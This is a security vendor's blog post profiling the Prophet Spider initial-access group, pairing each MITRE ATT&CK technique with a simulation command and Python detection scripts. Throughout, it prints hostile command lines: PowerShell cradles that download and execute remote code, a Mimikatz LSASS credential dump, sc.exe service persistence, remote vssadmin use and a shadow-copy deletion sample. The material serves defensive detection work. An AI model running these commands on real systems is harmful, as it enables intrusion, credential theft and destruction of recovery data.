
Prophet Spider Threat Actor Explained

Written by Sıla Özeren Hacıoğlu | Nov 7, 2025 10:30:00 AM

Prophet Spider is a financially motivated intrusion group active since at least 2017. It operates as an initial access broker within the ransomware economy. Rather than deploying ransomware directly, the group compromises corporate networks and sells or rents access to affiliates linked to operations like Conti, Ryuk, and BlackCat (ALPHV).

Prophet Spider primarily targets organizations in North America and Europe, exploiting vulnerabilities in internet-facing applications such as Oracle WebLogic and Apache Tomcat. Once inside, it deploys web shells, steals credentials, and uses tools like PowerShell and Cobalt Strike for reconnaissance and lateral movement.

The group’s motive is purely commercial. By maintaining stealth, covering traces, and reusing infrastructure across campaigns, Prophet Spider has become a critical enabler for large-scale ransomware attacks, representing the organized, profit-driven side of modern cybercrime.

In this blog, we examine Prophet Spider’s intrusion campaigns mapped to the MITRE ATT&CK framework.

Command and Control

T1105 - Ingress Tool Transfer

Downloading malicious binaries via Invoke-WebRequest

Prophet Spider is known to download customized tools and malicious binaries using PowerShell’s Invoke-WebRequest utility.

How Does Picus Help?

powershell.exe Invoke-WebRequest -Uri "%remotefile-9786%" -OutFile "$Env:TMP\dummy.exe"

The payload downloads a remote binary into a writable temp location using PowerShell’s web request utility, then stages it for later execution. This compact transfer mirrors how attackers fetch tools while blending with normal outbound traffic.

The designed payload leverages:

  • Invoke-WebRequest (native PowerShell HTTP fetch) to perform a direct file transfer,
  • a forged or normal User-Agent/HTTP header behavior to resemble benign client requests, and
  • writing to a temp folder ($Env:TMP) to stage the artifact in a predictable, writable location.

Thus, this payload safely simulates an ingress tool transfer (download → stage), allowing defenders to observe the same runtime artifacts (outbound HTTP fetch, requested URL, staged file path, and associated process command line) in a controlled manner.

T1071 - Application Layer Protocol

Querying DNS for C2 server using "nslookup" command

Prophet Spider is known to query DNS for command-and-control hostnames using the nslookup utility.

How Does Picus Help?

nslookup.exe ping.attack.picusops.io

The payload performs a DNS lookup for a C2 hostname, turning hostname resolution into a signal that a remote controller may be reachable while leaving minimal on-disk artifacts.

It leverages:

  • nslookup.exe to perform a direct DNS query (simple, native tool invocation),
  • a C2-style hostname (ping.attack.picusops.io) to test resolver behavior and recursive lookup paths, and
  • DNS traffic, which often bypasses HTTP/HTTPS proxies and can blend with routine name-resolution noise.

This payload safely simulates a DNS-based C2 lookup so defenders can observe the runtime artifacts (DNS queries, queried hostnames, resolver chain, and process → network correlation) without contacting a live malicious server.
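The process → network correlation mentioned above is the part most teams never wire up: a DNS query log on its own does not say which program asked. The following added example (not Picus code, not part of the original post) joins Sysmon-style DNS query events (Event ID 22) to process-creation events (Event ID 1) on ProcessGuid and flags lookups issued by scriptable system tools for domains outside an allowlist. All records, GUIDs, paths, domains and the allowlist are constructed; the only value taken from the post is the ping.attack.picusops.io hostname.

```python
"""Tie DNS queries back to the process that issued them.

Added example for this post (not Picus code): joins Sysmon-style DNS query
events (Event ID 22) to process-creation events (Event ID 1) on ProcessGuid and
flags lookups made by scriptable system tools for domains outside an allowlist.
All records, GUIDs, paths and domains below are constructed; the hostname
ping.attack.picusops.io is the one quoted in the post."""
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "guid image parent_image command_line")
DnsEvent = namedtuple("DnsEvent", "guid query")

# Tools that rarely resolve names on a user's behalf; a lookup from one of
# these is usually scripted (or attacker driven) rather than interactive.
SCRIPTED_RESOLVERS = {"nslookup.exe", "powershell.exe", "cmd.exe",
                      "rundll32.exe", "mshta.exe", "certutil.exe"}

# Domains these tools are expected to resolve in this (constructed) estate.
EXPECTED_DOMAINS = {"corp.example", "microsoft.com", "windowsupdate.com"}

# Constructed Event ID 1 records (fields abbreviated).
PROCESSES = [
    ProcEvent("{A1}", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\services.exe", "svchost.exe -k NetworkService"),
    ProcEvent("{B2}", r"C:\Windows\System32\nslookup.exe",
              r"C:\Windows\System32\cmd.exe", "nslookup.exe ping.attack.picusops.io"),
    ProcEvent("{C3}", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              r"powershell.exe Invoke-WebRequest -Uri https://files.example.test/dummy.exe -OutFile $Env:TMP\dummy.exe"),
    ProcEvent("{D4}", r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r"C:\Windows\explorer.exe", "firefox.exe"),
    ProcEvent("{E5}", r"C:\Windows\System32\nslookup.exe",
              r"C:\Windows\System32\cmd.exe", "nslookup.exe dc01.corp.example"),
]

# Constructed Event ID 22 records.
DNS_QUERIES = [
    DnsEvent("{A1}", "wpad.corp.example"),
    DnsEvent("{B2}", "ping.attack.picusops.io"),
    DnsEvent("{C3}", "files.example.test"),
    DnsEvent("{D4}", "www.mozilla.org"),
    DnsEvent("{E5}", "dc01.corp.example"),
    DnsEvent("{ZZ}", "orphan.example"),   # no matching process event (log gap)
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_allowlist(domain, allow=EXPECTED_DOMAINS):
    """True if domain equals or is a subdomain of an allowlisted zone."""
    d = domain.lower().rstrip(".")
    return any(d == a or d.endswith("." + a) for a in allow)


def correlate(processes, dns_queries, allow=EXPECTED_DOMAINS):
    """Return one finding per suspicious lookup, with the process chain that made it."""
    by_guid = {p.guid: p for p in processes}
    findings = []
    for q in dns_queries:
        proc = by_guid.get(q.guid)
        if proc is None:
            continue  # orphan query; a real pipeline would count these as a coverage gap
        image = basename(proc.image)
        if image in SCRIPTED_RESOLVERS and not in_allowlist(q.query, allow):
            findings.append({
                "query": q.query,
                "process": image,
                "parent": basename(proc.parent_image),
                "command_line": proc.command_line,
            })
    return findings


if __name__ == "__main__":
    for f in correlate(PROCESSES, DNS_QUERIES):
        print(f"{f['parent']} -> {f['process']} resolved {f['query']}: {f['command_line']}")
```

Run against the constructed records, the nslookup query for the C2-style hostname and the PowerShell download host are the two findings; the nslookup for a domain-controller name in the allowlisted zone and the browser lookup are not. The join on ProcessGuid rather than PID matters because PIDs are reused and a short-lived nslookup.exe is exactly the kind of process whose PID is recycled quickly.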

Execution

T1059.001 - Command and Scripting Interpreter: PowerShell

Downloading and executing malicious binaries via PowerShell

Prophet Spider is known to download and execute payloads using PowerShell.

How Does Picus Help?

powershell.exe -executionpolicy bypass -noprofile -w hidden $var = new-Object System.Net.webClient; $var.Headers['User-Agent']='Windows'; $var.downloadfile('%remotefile-16645%', '%temp%\dummy.exe'); & start %temp%\dummy.exe

The payload fetches a binary from the internet, stages it in a writable temp location, and launches it immediately, all in one compact PowerShell invocation that minimizes noise and avoids profile/policy checks.

It leverages:

  • -executionpolicy bypass -noprofile -w hidden to run quietly and skip local policy/profile interference,
  • System.Net.WebClient (DownloadFile) to perform a native HTTP(S) fetch that resembles normal client traffic,
  • a forged User-Agent header to blend with benign requests, and
  • writing to %TEMP% plus an immediate start to turn the fetch into active execution.

The designed payload safely simulates an end-to-end staging-and-launch sequence. 

Executing PowerShell script by using DownloadString and Invoke-Expression

Prophet Spider is known to execute in-memory PowerShell scripts using the DownloadString + Invoke-Expression pattern.

How Does Picus Help?

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('%remotefile-9776%')"

The payload fetches a script over HTTP(S) and runs it directly in memory without writing a file to disk, avoiding many traditional forensic artifacts and reducing cleanup effort.

It relies on:

  • trusted runtime APIs (PowerShell + .NET),
  • a single compact invocation that masks intent (-nop -exec bypass suppresses profiles and policy), and
  • passing the remote code to IEX for immediate execution.
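The three PowerShell command lines quoted in this post (the Invoke-WebRequest download under T1105, the WebClient download-and-start, and the DownloadString + IEX cradle) differ in how their switches are spelled, and powershell.exe accepts short forms such as -nop, -ep/-ex/-exec, -w and -e/-ec/-enc, so a detection keyed on one spelling misses the others. The following added example (not Picus code, not part of the original post) normalises the switches, decodes an -EncodedCommand payload before matching, and classifies the script body into download-to-disk, staged execution, or fileless execution. The sample command lines are the post's own three (including its %remotefile-…% placeholders) plus constructed variants; the indicator patterns and the verdict names are assumptions.

```python
"""Normalise powershell.exe command lines and classify download cradles.

Added example for this post (not Picus code).  Handles the switch
abbreviations powershell.exe accepts (-nop, -ep/-ex/-exec, -w, -c, -e/-ec/-enc)
so the same cradle is recognised however the switches are spelled, and decodes
-EncodedCommand payloads before matching.  Samples are the post's three
command lines plus constructed variants."""
import base64
import re

# Short forms powershell.exe accepts for its switches.
ALIASES = {
    "noprofile": {"noprofile", "nop"},
    "noninteractive": {"noninteractive", "noni"},
    "executionpolicy": {"executionpolicy", "ep", "ex", "exec"},
    "windowstyle": {"windowstyle", "w"},
    "file": {"file", "f"},
    "command": {"command", "c"},
    "encodedcommand": {"encodedcommand", "e", "ec", "enc"},
}
TAKES_VALUE = {"executionpolicy", "windowstyle", "file"}

# Behavioural indicators, matched against the lower-cased script body (assumed set).
INDICATORS = {
    "download_to_disk": r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|\.downloadfile\(",
    "download_to_memory": r"\.downloadstring\(|\.downloaddata\(|invoke-restmethod|\birm\b",
    "in_memory_exec": r"\biex\b|invoke-expression",
    "temp_staging": r"\$env:tmp|\$env:temp|%temp%|%tmp%",
    "immediate_launch": r"(?:^|[;|&]\s*)(?:start-process|start)\b",
}


def _canonical(token):
    name = token.lstrip("-/").lower()
    return next((k for k, v in ALIASES.items() if name in v), name)


def parse_command_line(cmdline):
    """Return (switches, script_text) for a powershell.exe invocation."""
    tokens = cmdline.split()
    i = 1 if tokens and tokens[0].lower().rsplit("\\", 1)[-1] in (
        "powershell.exe", "powershell", "pwsh.exe", "pwsh") else 0
    switches, script = {}, ""
    while i < len(tokens) and tokens[i][:1] in "-/":
        canon = _canonical(tokens[i])
        i += 1
        if canon in TAKES_VALUE and i < len(tokens):
            switches[canon] = tokens[i].lower()
            i += 1
        elif canon == "encodedcommand" and i < len(tokens):
            switches[canon] = True
            script = base64.b64decode(tokens[i]).decode("utf-16-le")  # blob is UTF-16LE
            i = len(tokens)
        elif canon == "command":
            switches[canon] = True
            break  # everything after -Command is the script
        else:
            switches[canon] = True
    if not script:
        script = " ".join(tokens[i:]).strip('"')
    return switches, script


def quiet_flags(switches):
    """Switches that suppress profiles, policy or the console window."""
    flags = []
    if switches.get("executionpolicy") in ("bypass", "unrestricted"):
        flags.append("executionpolicy=" + switches["executionpolicy"])
    if switches.get("noprofile"):
        flags.append("noprofile")
    if switches.get("windowstyle") == "hidden":
        flags.append("windowstyle=hidden")
    return flags


def classify(cmdline):
    switches, script = parse_command_line(cmdline)
    body = script.lower()
    hits = [name for name, rx in INDICATORS.items() if re.search(rx, body)]
    if "download_to_memory" in hits and "in_memory_exec" in hits:
        verdict = "fileless_execution"
    elif "download_to_disk" in hits and "immediate_launch" in hits:
        verdict = "staged_execution"
    elif "download_to_disk" in hits or "download_to_memory" in hits:
        verdict = "download_cradle"
    else:
        verdict = "none"
    return {"verdict": verdict, "indicators": hits,
            "evasion": quiet_flags(switches), "script": script}


# Constructed encoded variant of the IEX cradle (plaintext shown so it can be checked).
ENCODED_PLAIN = "IEX (New-Object Net.WebClient).DownloadString('http://files.example.test/a.ps1')"
ENCODED = base64.b64encode(ENCODED_PLAIN.encode("utf-16-le")).decode()

SAMPLES = {
    "iwr": 'powershell.exe Invoke-WebRequest -Uri "%remotefile-9786%" -OutFile "$Env:TMP\\dummy.exe"',
    "webclient": "powershell.exe -executionpolicy bypass -noprofile -w hidden $var = new-Object System.Net.webClient; $var.Headers['User-Agent']='Windows'; $var.downloadfile('%remotefile-16645%', '%temp%\\dummy.exe'); & start %temp%\\dummy.exe",
    "iex": 'powershell.exe -nop -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring(\'%remotefile-9776%\')"',
    "encoded": "powershell.exe -NoP -W Hidden -Enc " + ENCODED,
    "benign": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        r = classify(cmd)
        print(f"{name:9} {r['verdict']:19} {r['indicators']} {r['evasion']}")
```

The verdict alone is not the alert: the quiet-flag list is what separates an administrator's -NoProfile one-liner from the hidden-window, policy-bypassing fetch-and-start that the WebClient sample shows. Splitting on whitespace is deliberately simple; a production parser would also handle quoted arguments and the Unicode dash variants PowerShell accepts.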

Persistence

T1569.002 - System Services: Service Execution

Creating a new service "windowsinspectionupdate"

The Prophet Spider e-crime group has been observed creating a new service called “windowsinspectionupdate” to stage and launch a payload via a trusted system binary.

How Does Picus Help?

#Process 1
sc.exe create windowsinspectionupdate binpath= "cmd /c start c:/windows/temp/tmp/lld.exe c:/windows/temp/tmp/tmp.log"
#Process 2
sc.exe description windowsinspectionupdate "windows inspection integrity"
#Process 3
sc.exe config windowsinspectionupdate start= auto

The sequence creates a Windows service that stages and launches a payload via a trusted system binary, persists across reboots, and presents benign metadata to reduce suspicion.

It leverages:

  • a binpath that points to cmd /c start … (trusted binary used as the launcher),
  • start to spawn the payload as a detached child process (decouples execution from the service host),
  • staging the payload in a writable temp folder (c:\windows\temp\tmp\…) to simplify write/execute, and
  • setting a description plus start= auto to appear legitimate and ensure boot-time persistence.

This sequence safely simulates service-based persistence so that defenders can observe the same runtime artifacts (service registry entries, service arguments, detached parent → child process relationships, and staged file paths) without installing or running real malicious software.
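The three sc.exe commands above arrive as three separate process-creation events, and sc.exe's option syntax (key= value, with a mandatory space after the equals sign) splits binpath= from its value, so a detection that looks at one command line in isolation sees only part of the service definition. The following added example (not Picus code, not part of the original post) tokenises sc.exe create/description/config lines, merges them into one record per service, and triages the binary path for the traits the post lists: a launcher binary such as cmd, a detached start, a writable temp directory, and start= auto. The windowsinspectionupdate lines are the post's own; the benign contoso-backup service, the FILESRV01 server name, and the severity rules are assumptions.

```python
"""Parse sc.exe service-definition commands and triage the resulting service.

Added example for this post (not Picus code).  sc.exe takes options as
'key= value' with a mandatory space after '=', so 'binpath= "cmd /c ..."'
arrives as two tokens; successive create/description/config lines for the same
service are merged into one record before the binary path is checked.  The
constructed benign service and server name are assumptions; the
windowsinspectionupdate lines are the post's own."""
import re

TOKEN = re.compile(r'"([^"]*)"|(\S+)')
LAUNCHERS = {"cmd", "powershell", "pwsh", "rundll32", "mshta", "wscript", "cscript", "regsvr32"}
WRITABLE_DIRS = {  # directories an unprivileged or low-effort writer can stage into
    "windows_temp": r"[\\/]windows[\\/]temp[\\/]",
    "user_temp": r"[\\/]appdata[\\/]local[\\/]temp[\\/]",
    "users_public": r"[\\/]users[\\/]public[\\/]",
    "programdata": r"[\\/]programdata[\\/]",
}


def tokenize(cmdline):
    """Split on whitespace but keep double-quoted values (quotes removed) as one token."""
    return [m.group(1) if m.group(1) is not None else m.group(2) for m in TOKEN.finditer(cmdline)]


def parse_sc(cmdline):
    """Return {'verb','name','server','opts'} or None if this is not an sc.exe definition."""
    toks = tokenize(cmdline)
    if not toks or toks[0].replace("/", "\\").rsplit("\\", 1)[-1].lower() not in ("sc.exe", "sc"):
        return None
    i, server = 1, None
    if i < len(toks) and toks[i].startswith("\\\\"):      # sc.exe \\server verb ...
        server, i = toks[i], i + 1
    if i + 1 >= len(toks):
        return None
    verb, name = toks[i].lower(), toks[i + 1]
    i += 2
    opts = {}
    if verb == "description":
        opts["description"] = " ".join(toks[i:])
    elif verb in ("create", "config"):
        while i < len(toks):
            key = toks[i].lower()
            if key.endswith("=") and i + 1 < len(toks):    # canonical 'key= value'
                opts[key[:-1]] = toks[i + 1]
                i += 2
            elif "=" in key:                                # tolerate 'key=value' for normalisation
                k, v = toks[i].split("=", 1)
                opts[k.lower()] = v
                i += 1
            else:
                i += 1
    else:
        return None
    return {"verb": verb, "name": name, "server": server, "opts": opts}


def build_services(cmdlines):
    """Merge successive sc.exe commands into one record per service name."""
    services = {}
    for line in cmdlines:
        parsed = parse_sc(line)
        if parsed is None:
            continue
        rec = services.setdefault(parsed["name"].lower(),
                                  {"name": parsed["name"], "server": None, "opts": {}})
        rec["opts"].update(parsed["opts"])
        rec["server"] = rec["server"] or parsed["server"]
    return services


def triage(rec):
    opts = rec["opts"]
    binpath = opts.get("binpath", "").lower()
    findings = []
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', binpath)
    first = (m.group(1) or m.group(2)) if m else ""
    first = re.split(r"[\\/]", first)[-1]
    if first.endswith(".exe"):
        first = first[:-4]
    if first in LAUNCHERS:
        findings.append("launcher_binary:" + first)
    if re.search(r"\bcmd(?:\.exe)?\b.*\s/c\s.*\bstart\b", binpath):
        findings.append("detached_start")          # service host is not the payload's parent
    for label, rx in WRITABLE_DIRS.items():
        if re.search(rx, binpath):
            findings.append("writable_path:" + label)
            break
    if opts.get("start", "").lower() == "auto":
        findings.append("autostart")
    if rec["server"]:
        findings.append("remote_create")
    launcher = any(f.startswith("launcher_binary") for f in findings)
    writable = any(f.startswith("writable_path") for f in findings)
    severity = "high" if launcher and writable else "medium" if (launcher or writable) else "low"
    return {"service": rec["name"], "binpath": opts.get("binpath", ""),
            "findings": findings, "severity": severity}


SAMPLE_COMMANDS = [
    # The three lines quoted in the post.
    'sc.exe create windowsinspectionupdate binpath= "cmd /c start c:/windows/temp/tmp/lld.exe c:/windows/temp/tmp/tmp.log"',
    'sc.exe description windowsinspectionupdate "windows inspection integrity"',
    "sc.exe config windowsinspectionupdate start= auto",
    # Constructed benign service installed remotely by an administrator.
    r'sc.exe \\FILESRV01 create contoso-backup binpath= "C:\Program Files\Contoso\BackupAgent\agent.exe" start= auto',
    r'sc.exe \\FILESRV01 description contoso-backup "Contoso backup agent"',
]

if __name__ == "__main__":
    for rec in build_services(SAMPLE_COMMANDS).values():
        print(triage(rec))
```

The same merge applies to System log Event ID 7045 (service installed), which already carries the final ImagePath; the command-line form is useful when you want to catch the definition before the service ever starts, and to tie it to the user and parent process that ran sc.exe. A benign remote install is reported as a finding but not escalated on its own, because remote service creation is routine administration; it becomes interesting in combination with a launcher binary or a writable path.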

Credential Access

T1003.001 - OS Credential Dumping: LSASS Memory

Gathering credentials using Mimikatz (2.2.0 20220617) tool

Prophet Spider leverages the well-known Mimikatz tool to dump LSASS memory.

How Does Picus Help?

%TMP%\mimikatz.exe privilege::debug sekurlsa::logonPasswords exit

The payload attempts to extract credentials from LSASS memory using Mimikatz, producing plaintext credentials, NTLM/LM hashes, and Kerberos tickets if present. This is a direct, high-impact credential-access technique.

It leverages:

  • privilege::debug to enable SeDebugPrivilege required to open the LSASS process,
  • sekurlsa::logonPasswords to enumerate and dump in-memory logon credentials and tickets,
  • execution from a writable temp path (%TMP%) to stage the tool without touching protected system folders, and
  • a native-looking tool name/version (Mimikatz) to mirror real attacker tooling and behavior.

This payload command safely simulates LSASS memory credential dumping, letting defenders observe the same runtime artifacts (process handles to lsass.exe, SeDebugPrivilege elevation, anomalous process memory reads, and resulting credential artifacts) without using real stolen credentials.
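The "process handles to lsass.exe" artifact above surfaces in Sysmon as a ProcessAccess event (Event ID 10) whose GrantedAccess field is a hex mask, and the mask is what separates a credential read from the harmless query-only handles that many system processes open. The following added example (not Picus code, not part of the original post) decodes that mask into the process access rights from winnt.h and ranks the event by whether the source process obtained memory rights and whether it is an expected accessor. The events, the mimikatz staging path (mirroring the %TMP% location quoted in the post), and the allowlist are constructed.

```python
"""Decode and rank Sysmon ProcessAccess (Event ID 10) events against lsass.exe.

Added example for this post (not Picus code).  Sysmon reports the access mask
the source process was granted as a hex string; the names below are the
process access rights from winnt.h.  Events are constructed; the mimikatz path
mirrors the %TMP% staging quoted in the post."""

PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x10000: "DELETE",
    0x20000: "READ_CONTROL",
    0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF

# Rights that let a caller read or tamper with LSASS memory.
MEMORY_RIGHTS = {"PROCESS_VM_READ", "PROCESS_VM_WRITE", "PROCESS_VM_OPERATION",
                 "PROCESS_CREATE_THREAD", "PROCESS_DUP_HANDLE"}

# Processes expected to open LSASS with memory rights on this (constructed) estate.
# Matching on path alone is weak; a real allowlist would also check the signer.
EXPECTED_ACCESSORS = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def decode_mask(mask):
    """Turn '0x1010' (or an int) into the list of right names it sets."""
    value = int(mask, 16) if isinstance(mask, str) else mask
    if value == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if value & bit]


def triage_access(event):
    """Rank one Event ID 10 record; returns None for non-LSASS targets."""
    if event["TargetImage"].rsplit("\\", 1)[-1].lower() != "lsass.exe":
        return None
    rights = decode_mask(event["GrantedAccess"])
    source = event["SourceImage"].lower()
    if source in EXPECTED_ACCESSORS:
        severity = "allowlisted"
    elif rights == ["PROCESS_ALL_ACCESS"] or MEMORY_RIGHTS.intersection(rights):
        severity = "high"      # can read (or alter) LSASS memory
    else:
        severity = "low"       # query-only handle, routine for many system processes
    return {"source": event["SourceImage"], "mask": event["GrantedAccess"],
            "rights": rights, "severity": severity}


def triage_all(events):
    return [r for r in (triage_access(e) for e in events) if r is not None]


# Constructed Event ID 10 records (fields abbreviated).
EVENTS = [
    {"SourceImage": r"C:\Users\u\AppData\Local\Temp\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Users\u\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for r in triage_all(EVENTS):
        print(f"{r['severity']:11} {r['mask']:9} {r['source']}  {r['rights']}")
```

Ranking on the decoded rights rather than on a fixed list of "bad" masks (0x1010, 0x1410, 0x1FFFFF) keeps the rule robust when a tool requests an unusual combination; any mask with PROCESS_VM_READ set is enough to read credential material, whatever else is in it. Sysmon only emits Event ID 10 for the targets its configuration includes, so the rule presupposes lsass.exe is in that include list.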

Impact

T1490 - Inhibit System Recovery

Creating shadow copy on Domain Controller via vssadmin tool

Prophet Spider is known to create shadow copies on domain controllers using the vssadmin utility.

How Does Picus Help?

Powershell.exe -c $domainController = ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).DomainControllers | Where-Object { $_.Roles -contains 'PDCRole' } | Select-Object -ExpandProperty Name; Invoke-Command -ComputerName $domainController -ScriptBlock { $shadowCopy = vssadmin create shadow /for=C:; $shadowCopy.Path } | ForEach-Object { $_ | Out-File -FilePath "$env:TMP\CarbonCopy.tmp" -Append -Force; if ($LASTEXITCODE -eq 0) { Write-Host "[+] Successful!" } }

The payload remotely invokes vssadmin create shadow on a domain controller, captures the command output to a temp file, and reports success, simulating attacker activity that touches Volume Shadow Copy Service (VSS) on a high-value host without actually harming production recovery data.

It leverages:

  • AD query to locate a domain controller (GetCurrentDomain().DomainControllers and role filter),
  • Invoke-Command (PowerShell remoting) to run vssadmin on the remote DC (WinRM/remote execution pattern),
  • vssadmin create shadow /for=C: to request a VSS shadow copy of the target volume,
  • piping output into a temp file for later analysis, and
  • an exit-code check to surface success/failure of the remote operation.

This payload safely simulates remote VSS activity on a domain controller so that defenders can observe the same runtime and network artifacts (AD lookup, WinRM/PowerShell remoting, vssadmin invocation, shadow-copy responses, and temp-file artifacts) without disrupting real recovery points.
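The WinRM/PowerShell remoting artifact above is visible in process telemetry on the domain controller: Invoke-Command runs its script block on the target inside wsmprovhost.exe, so a vssadmin.exe whose ancestry contains that host process was driven remotely. The following added example (not Picus code, not part of the original post) builds the process tree from Sysmon-style Event ID 1 records, walks each vssadmin invocation back to its ancestors, and ranks it by the vssadmin verb, by whether it arrived over remoting, and by whether the host is a domain controller. It generalises past the post's create case to the list and delete verbs of the same tool. The records, GUIDs, host names, the DC list and the severity ladder are constructed; the vssadmin create shadow /for=C: line is the post's.

```python
"""Walk process ancestry to decide whether a vssadmin invocation arrived over
remoting, and rank it by action and host.

Added example for this post (not Picus code).  Invoke-Command over WinRM runs
on the target inside wsmprovhost.exe, so a vssadmin.exe whose ancestry contains
that host process was driven remotely.  Records, GUIDs and host names are
constructed; 'vssadmin create shadow /for=C:' is the post's own line."""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "guid parent_guid host image command_line")

# Host processes that execute remotely supplied commands (WinRM, PsExec, WMI).
REMOTING_HOSTS = {"wsmprovhost.exe", "psexesvc.exe", "wmiprvse.exe"}
DOMAIN_CONTROLLERS = {"DC01"}          # assumed asset inventory
LEVELS = ["low", "medium", "high", "critical"]

# vssadmin verbs, most damaging first.
ACTIONS = [
    ("delete", re.compile(r"\bdelete\s+shadows\b", re.I)),
    ("resize", re.compile(r"\bresize\s+shadowstorage\b", re.I)),
    ("create", re.compile(r"\bcreate\s+shadow\b", re.I)),
    ("list", re.compile(r"\blist\s+shadows\b", re.I)),
]

# Constructed Event ID 1 records (fields abbreviated).  {G0} and {G9} are
# parents that fell outside the collected window.
EVENTS = [
    Proc("{G1}", "{G0}", "DC01", r"C:\Windows\System32\svchost.exe", "svchost.exe -k NetworkService -p -s WinRM"),
    Proc("{G2}", "{G1}", "DC01", r"C:\Windows\System32\wsmprovhost.exe", "wsmprovhost.exe -Embedding"),
    Proc("{G3}", "{G2}", "DC01", r"C:\Windows\System32\vssadmin.exe", "vssadmin create shadow /for=C:"),
    Proc("{G4}", "{G9}", "WS01", r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc("{G5}", "{G4}", "WS01", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    Proc("{G6}", "{G5}", "WS01", r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
    Proc("{G7}", "{G2}", "DC01", r"C:\Windows\System32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(proc, by_guid):
    """Yield proc and its ancestors, stopping at a missing parent or a cycle."""
    seen = set()
    while proc is not None and proc.guid not in seen:
        seen.add(proc.guid)
        yield proc
        proc = by_guid.get(proc.parent_guid)


def classify_vss(proc, by_guid):
    if basename(proc.image) != "vssadmin.exe":
        return None
    action = next((name for name, rx in ACTIONS if rx.search(proc.command_line)), "other")
    chain = [basename(p.image) for p in ancestry(proc, by_guid)]
    remote_via = next((img for img in chain if img in REMOTING_HOSTS), None)
    if action in ("delete", "resize"):
        level = 3                     # recovery points removed or squeezed out
    elif remote_via:
        level = 1                     # benign verb, but driven over remoting
    else:
        level = 0
    if proc.host in DOMAIN_CONTROLLERS:
        level = min(level + 1, 3)     # the same action matters more on a DC
    return {"guid": proc.guid, "host": proc.host, "action": action,
            "remote_via": remote_via, "chain": chain, "severity": LEVELS[level]}


def scan(events):
    by_guid = {e.guid: e for e in events}
    return [r for r in (classify_vss(e, by_guid) for e in events) if r is not None]


if __name__ == "__main__":
    for r in scan(EVENTS):
        print(f"{r['severity']:8} {r['host']} {r['action']:6} via={r['remote_via']} {' <- '.join(r['chain'])}")
```

The post's simulated create on the DC lands at "high": the verb itself is harmless, but a shadow-copy request arriving through wsmprovhost.exe on a domain controller is exactly the remoting-plus-VSS combination the simulation is meant to surface, and the same ancestry walk flags the delete form at "critical" with no extra rule. Walking by ProcessGuid rather than PID avoids false chains from PID reuse, and the cycle guard keeps malformed telemetry from looping.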

How Does Picus Help Defend Against Prophet Spider Attacks?

The Picus Security Validation Platform safely simulates Prophet Spider e-crime threat group’s Windows endpoint campaigns, replicating the malware’s new plug-in functionality for validation purposes. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.

You can also test your defenses against hundreds of other threat actors, such as Salt Typhoon APT, APT28, and Lazarus APT, within minutes with a 14-day free trial of the Picus Platform.

Threat ID | Threat Name | Attack Module
67113 | Prophet Spider Threat Group Campaign | Windows Endpoint